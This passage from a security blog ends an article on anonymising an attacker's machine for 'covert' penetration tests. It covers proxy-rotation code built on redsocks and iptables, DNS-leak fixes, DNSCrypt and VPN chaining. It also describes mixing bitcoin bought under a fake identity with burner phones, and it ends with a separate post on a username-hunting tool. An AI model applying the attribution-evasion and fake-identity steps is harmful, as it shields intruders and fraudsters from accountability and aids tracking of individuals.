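        remaining *= 1.0 - p
    return shares


def redsocks_sections(proxies, base_port=11080):
    """One redsocks{} block per upstream (ip, port), on consecutive local ports."""
    blocks = []
    for i, (ip, port) in enumerate(proxies):
        blocks.append(
            "redsocks {\n"
            "    local_ip = 127.0.0.1;\n"
            f"    local_port = {base_port + i};\n"
            f"    ip = {ip};\n"
            f"    port = {port};\n"
            "    type = socks5;\n"
            "}"
        )
    return "\n".join(blocks)


def redirect_rules(n, base_port=11080, chain="REDSOCKS"):
    """REDIRECT rules for the chain; only the last one has no statistic match.
    These replace the single `-j REDIRECT --to-ports 12345` line of iproute.sh."""
    rules = []
    for i, p in enumerate(rule_probabilities(n)):
        match = f" -m statistic --mode random --probability {p:.10f}" if p is not None else ""
        rules.append(f"iptables -t nat -A {chain} -p tcp{match} -j REDIRECT --to-ports {base_port + i}")
    return rules


if __name__ == "__main__":
    # Constructed placeholder proxies (TEST-NET-2 addresses), not real scraped ones.
    proxies = [("198.51.100.10", 1080), ("198.51.100.11", 1081), ("198.51.100.12", 1082)]
    print(redsocks_sections(proxies))
    print("\n".join(redirect_rules(len(proxies))))
    print("even split:  ", effective_shares(rule_probabilities(3)))
    print("0.333 twice: ", effective_shares([1 / 3, 1 / 3, None]))
```

    Note what this does not fix: the rules only cover TCP on the listed ports, so UDP DNS still bypasses every proxy, which is exactly the leak the next chapter deals with.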

    The purpose of this project is to be covert, and despite the use of a SOCKS5 proxy there is still a DNS leak, although the origin IP is now hidden. To test different scenarios "dnsleaktest.com"⁹ is used: although the origin IP is hidden and the proxy's IP is shown, the "dnsleaktest.com" extended test still reveals the original IP. To avoid this, DNS must also be covert, which is covered in the next chapter "Secure DNS".

    Secure DNS
    Proxies and IP masking are pointless without secure DNS, as a DNS leak will reveal the origin IP. (Good) VPNs set up their own DNS, and if VPNs could be trusted, a scraped proxy and secure DNS would not be required. As this is not the case, read on.

    DNS over Proxy
    There are several services that deliver DNS over proxy. For more information on DNS via proxy please refer to the surf section “Anon DNS Servers” ²⁴ ²⁵. Setting up a DNS proxy is quite straightforward, in the following example https://dns.watch ²⁴ DNS servers are applied. First update the resolver configuration:

    sudo nano /etc/resolvconf/resolv.conf.d/base
    nameserver 84.200.69.80
    nameserver 84.200.70.40
    sudo resolvconf -u
    Then set DNS for both IPv4 and IPv6 using NetworkManager²³ (use 84.200.69.80 and not 8.8.8.8):

    1. Search for "Network Connections"
    2. Open it
    Hacking A Rise networkcon1

    3. Select either WiFi or Ethernet, or whatever you are using, and click Edit. You'll get this:

    https://github.com/CPH-SEC/CPH-SEC.github.io/blob/master/pics/networkcon2.png

    4. Select the IPv4 tab
    5. Select "Addresses only" as the method
    6. Enter your DNS server below and save it (don't use 8.8.8.8, Google's transparent DNS, but e.g. 84.200.69.80)
    7. Repeat steps 4-6 for IPv6, and for all interfaces
    8. Restart NetworkManager: sudo service network-manager restart
    9. Test on dnsleaktest.com
    Testing with “dnsleaktest.com” result will now be as intended:

    https://github.com/CPH-SEC/CPH-SEC.github.io/blob/master/pics/dnsleakfixed.png

    Next chapter shows how to use DNSCrypt to add an extra level of DNS anonymity.

    DNSCrypt-Proxy Install & Setup
    Although the DNS leak was fixed by the configuration in the last chapter, some might still want to implement DNSCrypt as an additional layer of protection, although it is not strictly needed. First install dnscrypt-proxy like so:

    sudo apt purge dnscrypt-proxy
    sudo apt update
    sudo apt install dnscrypt-proxy
    sudo systemctl restart NetworkManager
    sudo systemctl restart dnscrypt-proxy
    sudo apt install resolvconf
    sudo nano /etc/NetworkManager/NetworkManager.conf
    Then edit “NetworkManager.conf” to look like this:

    [main]
    dns=default

    plugins=ifupdown,keyfile

    [ifupdown]
    managed=false

    [device]
    WiFi.scan-rand-mac-address=no
    And finally run “./restartDNScrypt.sh”, which does the following:

    sudo systemctl stop systemd-resolved
    sudo systemctl disable systemd-resolved
    sudo systemctl restart network-manager
    sudo systemctl restart dnscrypt-proxy
    In the next chapter another level of anonymity is presented as the use of VPN is discussed.

    Virtual Private Network
    In the earlier chapters it was shown how to mask the IP address and avoid a DNS leak. However, so far the traffic has not been encrypted and could be wiretapped, although the SSH connection to the VPS in part 2 will be encrypted. By using a VPN, wiretapping is avoided, so it is important to use a good VPN to make sure the encryption is strong enough. Furthermore, the effectiveness of a VPN differs depending on whether it is placed before or after the proxy servers. What is even more important is to obtain the VPN service covertly, as the use of a VPN bought with a credit card, that also keeps logs(!), defeats most efforts to be anonymous and act covertly on the net. Some points that need to be considered when choosing a VPN:

    Can be obtained covertly e.g. with cryptocurrency payment
    Logless
    Strong encryption
    Big Keys
    No leak, DNS, IP, WebRTC or other
    ExpressVPN and NordVPN, and others, are believed to be such VPNs.

    PROXY and VPN vs VPN and PROXY

    While it could seem trivial whether to use the proxy in front of the VPN or vice versa, it is in fact crucial in a world where VPNs can't be trusted. In this article a proxy is used in front of the VPN (seen from the host's side), i.e. traffic leaves the host through the proxy and only then enters the VPN, so the VPN provider's "non-existing" logs would show the proxy's IP rather than the client's origin. This only works if the VPN is obtained covertly, as discussed in the last chapter. One way to obtain a VPN covertly is covered in the next chapter.

    Bitcoin Mixing / Tumbling / Washing
    There are several ways to obtain a VPN and VPS covertly, but if no other method is available, buying a service with bitcoin is a possibility, when done correctly! As this is not an article about bitcoin, please refer to the internet for background information regarding bitcoin and/or cryptocurrency. Here the interest is in obtaining and using bitcoin anonymously; for a full guide please refer to the surf section³⁸. Note also that some cryptocurrencies are believed to be more anonymous than bitcoin, while not as widely accepted by vendors. In short, to mix/tumble/wash bitcoins a service such as 'Bitblender' or 'Bitmixer' is required. The process is as follows³⁸:

    Choose a bitcoin mixing service e.g. 'Bitblender' or 'Bitmixer'
    Use Tor (The Onion Router) to stay anonymous
    Use a logless VPN (NordVPN is believed to be such a VPN)
    Acquire a new address for transactions
    Buy/sell bitcoins in cash using a fake identity, using tools such as
    LocalBitcoins.com
    Fake Name Generator
    Guerrilla Mail
    Burner phone or service
    For extra safety try JoinMarket and trade
    Following this procedure flawlessly it is possible to buy services such as a VPN or VPS anonymously using bitcoin. Using bitcoin is only recommendable if other, more covert methods are not available, since the blockchain leaves a "paper trail" that could possibly, in the future, be traced using so far unknown computing power and algorithms. This is somewhat "tinfoil hat" speculation of course. Regardless of how the VPN is obtained it must be tested, and this is the topic of the next chapter.

    Testing VPNs
    Sadly, a large percentage of VPNs are useless and not as secure as advertised. In general there are 4 well-known ways a VPN can leak origin host information:

    IP Leak
    DNS Leak
    WebRTC Leak
    MSLeak Test*
    *MSLeak is only relevant for users of Microsoft Windows, which is not recommendable to use for anonymity.

    In this article 3 tools are used to test anonymity:

    https://ipleak.net/
    https://www.privacytools.io/
    https://www.perfect-privacy.com
    Testing a covertly obtained VPN gives results as below:

    Hacking A Rise ipleak_vpn

    Result shows VPN location, so test passed.

    https://github.com/CPH-SEC/CPH-SEC.github.io/raw/master/pics/pp_vpn_webrtc.png

    No WebRTC leak, so test passed.

    Hacking A Rise dnsleak_vpn

    No DNS leak, so test passed. Note that the DNS Leak test will show proxy or VPN IP depending on which is placed in front (last).

    Conclusion
    In this article it was described how to secure the origin host/client used by the operating agent in a covert pentesting assignment. Each step must be executed perfectly, but the included scripts make that possible.

    This was part 1 of a 3 part series, part 2 will demonstrate how to setup the VPS server that will run the actual tests and attack scripts; while chapter 3 will demonstrate how a custom test / attack framework could look.

    Surf (LMGTFY):
    Tools
    ¹ Fetch-some-proxies: https://github.com/stamparm/fetch-some-proxies
    ² https://github.com/jorgenkg/python-proxy-rotator
    ³ https://github.com/allfro/pymiproxy
    ⁴ https://github.com/constverum/ProxyBroker
    Multiple TOR Proxies
    ⁵ http://blog.databigbang.com/running-your-own-anonymous-rotating-proxies/
    ⁶ http://www.haproxy.org/
    ⁷ http://blog.databigbang.com/distributed-scraping-with-multiple-tor-circuits/
    ⁸ http://www.delegate.org/delegate/
    Test
    ⁹ DNS leak test: https://www.dnsleaktest.com
    ¹⁰ Whats my IP: https://www.whatsmyip.org/
    ¹¹ Browser fingerprinting test: https://panopticlick.eff.org/
    Privacy Tools: https://www.privacytools.io/
    https://ipleak.net/
    Redsocks and IPtables
    ¹² How to force all Linux apps to use SOCKS proxy: https://superuser.com/questions/1401585/how-to-force-all-linux-apps-to-use-socks-proxy?rq=1
    ¹³ https://crosp.net/blog/administration/install-configure-redsocks-proxy-centos-linux/
    ¹⁴ https://unix.stackexchange.com/questions/71429/redirect-all-non-local-traffic-to-a-socks-proxy
    ¹⁵ https://manpages.debian.org/stretch/iptables/iptables-extensions.8.en.html#TPROXY
    ¹⁶ Escape proxy hell with Redsocks: https://jmkhael.io/escape-proxy-hell-with-redsocks/
    Anon VPS
    ¹⁷ Anonymous SSD VPS: https://anonymously.io/anonymous-vps/
    ¹⁸ Cheap Anonymous VPS Providers: https://cheapvillage.com/cheap-anonymous-vps-providers/
    ¹⁹ Dreamhost with bitcoin: https://bitlaunch.io/
    DNS Leak Avoidance
    ²⁰ https://www.smarthomebeginner.com/vpn-kill-switch-with-ufw/
    ²¹ https://support.rackspace.com/how-to/changing-dns-settings-on-linux/
    ²² https://unix.stackexchange.com/questions/128220/how-do-i-set-my-dns-when-resolv-conf-is-being-overwritten/163506#163506
    ²³ https://unix.stackexchange.com/questions/494324/how-to-setup-dns-manually-on-linux

    Anon DNS servers
    ²⁴ Secure DNS root: https://dns.watch
    ²⁵ Secure DNS root: https://www.opennic.org/

    RDP
    ²⁶ RDP Manual: https://5socks.net/Manual/rdp_eng.html
    ²⁷ RDP VPN Manual: https://5socks.net/Manual/what_is_rdp_vpn_eng.htm
    SSH Routing
    ²⁸ https://linuxize.com/post/how-to-setup-ssh-socks-tunnel-for-private-browsing/
    ²⁹ https://www.dnsflex.com/how-to-route-all-network-traffic-from-your-lan-securely-through-a-socks5-proxy-ssh-tunnel-redsocks/
    ³⁰ https://hackertarget.com/ssh-examples-tunnels/
    SSH Routing with a Service
    ³¹ Expose local servers to the internet: https://serveo.net/
    ³² Public URLs for exposing your local web server: https://ngrok.com/
    Browser & OS Hardening
    ³³ Firefox privacy, security and anti-fingerprinting: https://github.com/ghacksuserjs/ghacks-user.js
    ³⁴ The Practical Linux Hardening Guide: https://github.com/trimstray/the-practical-linux-hardening-guide
    ³⁵ how-to-stay-anonymous: https://www.hackeroyale.com/how-to-stay-anonymous/
    ³⁶ user.js – Firefox configuration hardening : https://github.com/pyllyukko/user.js
    VPN
    ³⁷ How To Stay Anonymous While Hacking: https://www.tech21century.com/expressvpn-vs-nordvpn-comparison/
    Bitcoin

    ³⁸ Ways To Guarantee Anonymity When Making Bitcoin Transactions: https://coinsutra.com/anonymous-bitcoin-transactions/

    Tuesday, June 11, 2019

    Userrecon-Py - Find Usernames In Social Networks

    Find usernames in social networks

    Installation

    1. Install dependencies(Debian/Ubuntu):

    sudo apt install python3 python3-pip

    2. Install with pip3:

    sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.git
    userrecon-py --help

    Building from Source
    Clone this repository, and:

    git clone https://github.com/decoxviii/userrecon-py.git ; cd userrecon-py
    sudo -H pip3 install -r requirements.txt
    python3 setup.py build
    sudo python3 setup.py install

    Update
    To update this tool to the latest version, run:

    sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.git --upgrade
    userrecon-py --version

    Usage
    Start by printing the available actions by running userrecon-py --help. Then you can perform the following tests:

    userrecon-py target chommie_smith -o test1